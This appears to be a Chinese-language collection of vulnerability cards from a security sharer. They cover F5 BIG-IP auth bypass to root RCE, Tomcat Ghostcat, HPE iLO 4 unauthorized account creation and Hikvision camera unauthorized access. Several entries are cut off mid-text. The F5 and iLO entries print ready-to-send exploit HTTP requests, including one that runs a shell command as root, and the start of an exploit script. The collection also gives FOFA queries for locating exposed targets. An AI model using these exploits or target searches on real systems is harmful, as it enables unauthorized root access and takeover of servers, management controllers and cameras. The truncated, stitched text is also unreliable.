原理在同时设置HTTP基础认证与X-F5-Auth-Token头且值为空时,会绕过程序对身份的验证,通过特定的接口即可进行远程命令执行。影响范围危害可以获取root权限,并以root权限执行命令。POC & EXP手工POST /mgmt/tm/util/bash HTTP/1.1 Host: 192.168.59.7 Content-Type: application/json X-F5-Auth-Token: Authorization: Basic YWRtaW46 Content-Length: 52 { "command": "run", "utilCmdArgs": "-c id" }脚本import requests import json import sys requests.packages.urllib3.disable_warnings() proxies = {'http': 'http://localhost:7890', 'https': 'http://l
原理Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapps目录下的任意文件,但不能跨到上级目录。影响范围Apache Tomcat 6 ALLApache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31危害在网站存在文件上传功能时可通过该漏洞进行文件包含执行代码。POC & EXPfofaport="8009"&& country="CN"脚本链接https://github.com/00theway/Ghostcat-CNVD-2020-10487/
原理未授权访问,由于添加用户操作未对操作者的身份进行验证,导致未授权用户添加。影响范围iLO 4 固件版本低于2.54 的2.xx版本危害获取Web面板完整访问权限,可通过惠普iLO自带的远控软件对主机进行控制。下载地址为:https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8POC & EXPfofatitle="iLO"手工# POC GET /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x Content-Length: 273 Accept-Encoding: gzip, deflate Accept: */* Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA Content-Type: application/json # EXP POST /rest/v1/AccountService/Accounts HTTP/1.1 Host: x.x.x.x:x C
原理经典未授权访问,由于敏感路径未对请求者的身份进行验证,导致未授权访问。影响范围DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106危害可获取的摄像头敏感信息:用户名摄像头快照摄像头用户配置文
Equinox
一个乐于分享的网安人
